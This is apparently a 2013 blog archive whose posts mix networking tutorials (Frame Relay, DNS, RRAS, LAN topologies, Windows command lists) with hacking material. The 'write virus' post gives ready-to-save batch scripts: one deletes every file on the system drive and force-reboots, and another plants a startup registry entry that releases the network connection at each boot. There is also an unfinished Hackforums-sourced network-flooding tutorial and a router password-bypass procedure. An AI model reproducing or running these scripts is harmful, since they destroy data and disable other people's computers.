Saturday, November 30, 2013

block website by gorvam saddar



>>>Steps

1] Browse C:\WINDOWS\system32\drivers\etc

2] Find the file named "HOSTS"

3] Open it in notepad

4] Under "127.0.0.1 localhost" Add 127.0.0.2 www.orkut.com , and that site will no longer be accessable.

5] Done!


example :

127.0.0.1 localhost

127.0.0.2 www.orkut.com


www.orkut.com is now unaccessable

write virus, create virus, develop virus script by gorvam saddar

IMP. Note>> I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .

 All Scripts Here Are To Be Copied In Note Pad


>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Save The Above Code a .bat file



>>Disable Internet Permanently
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Thursday, November 28, 2013

sample exam papers networking mcitp cisco exam interview questions with answers by gorvam saddar

Technical Interview Questions (Part 1/3)
[Networking]


Edited & Maintained by SYED JAHANZAIB / aacable@hotmail.com

1.    What is an IP address? 

2.    What is a subnet mask? 

3.    What is ARP? 

4.    What is ARP Cache Poisoning? 

5.    What is the ANDing process? 

6.    What is a default gateway? What happens if I don’t have one? 

7.   Can a workstation computer be configured to browse the Internet and
yet NOT have a default gateway? 


8.    What is a subnet? 

9.    What is APIPA? 

10.   What is an RFC? Name a few if possible (not  necessarily
the numbers, just the ideas behind them) 

11.   What is RFC 1918? 
 many more answers tooo......

Thursday, November 14, 2013

NETWORK FLOODING ON IPV6 networtk jamming flood a network block network BY GORVAM SADDAR

EDUCATIONAL PURPOSES ONLY

Hello Hackforums, I would like to release this simple tutorial onto how to crash a PC based network. This exploit will work on 90% of networks. If the network of Windows computers connected are vulnerable they will consume 100% CPU usage and then become unresponsive. Now how to check if a network is vulnerable.

Press Windows Key + R on your keyboard and type "cmd" then press enter. Once inside command prompt type the following command.
Code:
ipconfig
Then look at your results. If your results including something along the lines of "IPv6 Address" the network is vulnerable. 90% of network are currently vulnerable to this.

How to take out the network
1> Boot into Backtrack 5 R3 and connect to the network
2> Run this command
Code:

Tuesday, November 5, 2013

Registry tutorial windows registry, change registery, registry editor regedit by gorvam saddar

Windows Registry Tutorial


Overview
The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.
The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article).
The Structure of the Registry
The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit being similar to Windows Explorer.


Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context.
There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows:

ALL ABOUT HACKERS AND HACKING WORD MEANS, HACK GLOSSARY by Gorvam saddar

We live in an era of unprecedented cyberattacks, where malicious campaigns, both personal and governmental, are carried out across laptops and wireless networks.
Even if you are not technically minded, your day-to-day life is still probably pretty crowded with stories about hacking, whether you recognize them as such or not.
Have you ever installed an antivirus tool on your computer? Read a story about WikiLeaks or the Arab Spring? Opened a bank account? Then hacking is important to you, even if remains largely in the background of your life. It makes sense to get informed about it. Unfortunately, it is a very technical subject, with a great deal of specialized vocabulary.

FRAME RELAY wan technology cisco ccna fully EXPLAINED with configuration by gorvam saddar

This paper will address the following issues:
  1. What is Frame Relay?
  2. How does Frame Relay differ from other techniques?
  3. What is Frame Relay useful for?
  4. How does frame relay fit in the U.S. Internet strategy?
  5. Mixing Frame Relay with other technologies
  6. Pros and Cons of Frame Relay
  7. Technical aspects of installing and running frame
Items one through six will address general overviews of frame; item 7 will be a technical discussion related to equipment installation and setup that is probably only interesting for the technical staff involved in this area.
1. What is Frame Relay?
Frame relay is a technique used to transport data from locations to location, just like T-1 lines or ISDN connections do. In frame relay, there are a number of locations on the network that can send and receive data. These connections are known as Ports. Each location that needs access to the frame system, needs to have one of these ports.

ROUTER PASSWORD BREAKING BYPASS ROUTER PASSWORD PROCESS STEP BY STEP GORVAM SADDAR


  • Turn the power switch off and back on to recycle the power. 
  • Press the Break key or key sequence to put the router into ROM Monitor mode. The break key varies by computer or terminal software. The sequence might be CTRL-D, CTRL-Breakor another combination. 
  • At the  > prompt, type 0 to record the current value of the configuration register normally 0x2102, or 0x102.
  • >o
    Configuration register = 0x2102 at last boot
    Bit#    Configuration register option settings:
    15      Diagnostic mode disabled. 
  • Type o/r 0x2142 to tell the router to boot from flash without loading the configuration in NVRAM at the next reload. 
  • Type i to have the router reboot. The router ignores the configuration in NVRAM.
  • The router runs the setup dialog, Type no or press Ctrl-C to skip the initial setup Dialog
  • Type enable ate the Router> prompt to go to privileged exec mode.
  • Copy the startup configuration to the running configuration by using the configure memory or copy startup-config running-config commands. Do not type configure terminal. If you use the configure terminal command, you overwrite the configuration stored in NVRAM.
  • View the configuration by typing write terminal or show running-config. View the configured line, vty and enable passwords. Any encrypted passwords need to be changed. 

ALL WINDOWS CMD COMMANDS, DOS COMMANDS, COMMAND PROMPT COMMNADS

ASSOC Displays or modifies file extension associations.
ATTRIB Displays or changes file attributes.
BREAK Sets or clears extended CTRL+C checking.
*BCDEDIT Sets properties in boot database to control boot loading.
CACLS Displays or modifies access control lists (ACLs) of files.
CALL Calls one batch program from another.
CD Displays the name of or changes the current directory.
CHCP Displays or sets the active code page number.
CHDIR Displays the name of or changes the current directory.
CHKDSK Checks a disk and displays a status report.
CHKNTFS Displays or modifies the checking of disk at boot time.
*CHOICE Batch file command that allows users to select from a set of options.
CIPHER Displays or alters the encryption of directories [files] on NTFS partitions.
*CLIP Redirects output of another command to the Windows clipboard.
CLS Clears the screen.
CMD Starts a new instance of the Windows command interpreter.
*CMDKEY Creates, lists and deletes stored user names and passwords or credentials.
COLOR Sets the default console foreground and background colors.
COMP Compares the contents of two files or sets of files.
COMPACT Displays or alters the compression of files on NTFS partitions.
CONVERT Converts FAT volumes to NTFS. You cannot convert the current drive.
COPY Copies one or more files to another location.
DATE Displays or sets the date.
DEFRAG Disk defragmenter accessory.

DNS SERVER ,FULL EXPLAINED STEP BY STEP GORVAM SADDAR


Understanding the DNS namespace


The following illustration shows how the DNS namespace is organized.

A DNS name consists of two or more parts separated by periods, or "dots" (.). The last (rightmost) part of the name is called the top-level domain (TLD). Other parts of the name are subdomains of the TLD or another subdomain. The names of the TLDs are either functional or geographical. Subdomains usually refer to the organization that owns the domain name.
Functional TLDs suggest the purpose of the organization that has registered a subdomain in the TLD. The following table shows some of the most common functional TLD names.

Functional TLD
Typically used by …
.com
Commercial entities, such as corporations, to register DNS domain names
.edu
Educational institutions, such as colleges, and public and private schools
.gov
Government entities, such as federal, state, and local governments
.net
Organizations that provide Internet services, such as Internet service providers (ISPs)
.org
Private, nonprofit organizations

Creating an Internet DNS domain name

An Internet DNS domain name has a TLD name, such as .com, .org, or .edu, and a unique subdomain name that the domain owner chooses. For example, a company named Contoso Corporation would probably choose contoso.com as its Internet domain name.

Monday, November 4, 2013

STEP BY STEP CONFIGURATION OF (RRAS) REMOTE ACCEES SERVER AND ROUTING WINDOWS SERVER 2008

Routing and Remote Access Service
Updated: September 30, 2009
Applies To: Windows 7, Windows Server 2008, Windows Server 2008 R2, Windows Vista
The Routing and Remote Access service (RRAS) in Windows Server® 2008 R2 and Windows Server® 2008 supports remote user or site-to-site connectivity by using virtual private network (VPN) or dial-up connections. RRAS consists of the following components:
  • Remote Access. By using RRAS, you can deploy VPN connections to provide end users with remote access to your organization's network. You can also create a site-to-site VPN connection between two servers at different locations.
  • Routing. RRAS is a software router and an open platform for routing and networking. It offers routing services to businesses in local area network (LAN) and wide area network (WAN) environments or over the Internet by using secure VPN connections. Routing is used for multiprotocol LAN-to-LAN, LAN-to-WAN, VPN, and network address translation (NAT) routing services.
Getting Started
  • Windows Server 2008 R2 and Windows Server 2008 each include new features designed to enhance security and manageability of RRAS. This topic describes the new features and other significant changes made to RRAS, including the addition of new VPN tunneling protocols, VPN enforcement for Network Access Protection, and Internet Protocol version 6 (IPv6) support. For more information, see What's New in Routing and Remote Access in Windows Server 2008.

NETWORKING TOPOLOGIES . GORVAM SADDAR

LAN Topologies

In the late 1960s and the early 1970s researchers developed a form of computer communication known as Local Area Networks (LANs). These are different from long-distance communications because they rely on sharing the network. Each LAN consists of a single shared medium, usually a cable, to which many computers are attached. The computers co-ordinate and take turns using the medium to send packets.
Unfortunately, this mechanism does not scale. Co-ordination requires communication, and the time to communicate depends on distance - large geographic separation between computers introduces longer delays. Therefore, shared networks with long delays are inefficient. In addition, providing high bandwidth communication channels over long distances is very expensive.
There are a number of different LAN technologies. Each technology is classified into a category according to its topology, or general shape. The first of these is a star topology, as illustrated in Figure 3.

Figure 3: Star topology
The hub accepts data from a sender and delivers it to the receiver. In practice, a star network seldom has a symmetric shape; the hub often resides in a separate location from the computers attached to it.
A network using a ring topology arranges the computers in a circle - the first computer is cabled to the second. Another cable connects the second computer to the third, and so on, until a cable connects the final computer back to the first. This is illustrated in Figure 4.

Friday, November 1, 2013

Browser specific comparison. KNOW YOUR BROWSER BROSER SECURITY BROWSER PLUGINS BY GORVAM SADDAR

this is the best link of all the major browsers all the listed features and from those i think firefox is the best.


 MAMIMIZE PICTURE TO VIEW THE CONTENTS.

hcon browser, used for hacking tasks, tamper data, Gorvam Saddar

Features
  • Categorized and comprehensive toolset
  • Contains hundreds of tools and features and script for different tasks like SQLi, XSS,Dorks, OSINT to name a few
  • HconSTF webUI with online tools (same as the Aqua base version of HconSTF)
  • Each and every option is configured for penetration testing and Vulnerability assessments
  • Specially configured and enhanced for gaining easy & solid anonymity
  • Works for web app testing assessments specially for owasp top 10
  • Easy to use & collaborative Operating System like interface
  • Multi-Language support (feature in heavy development translators needed)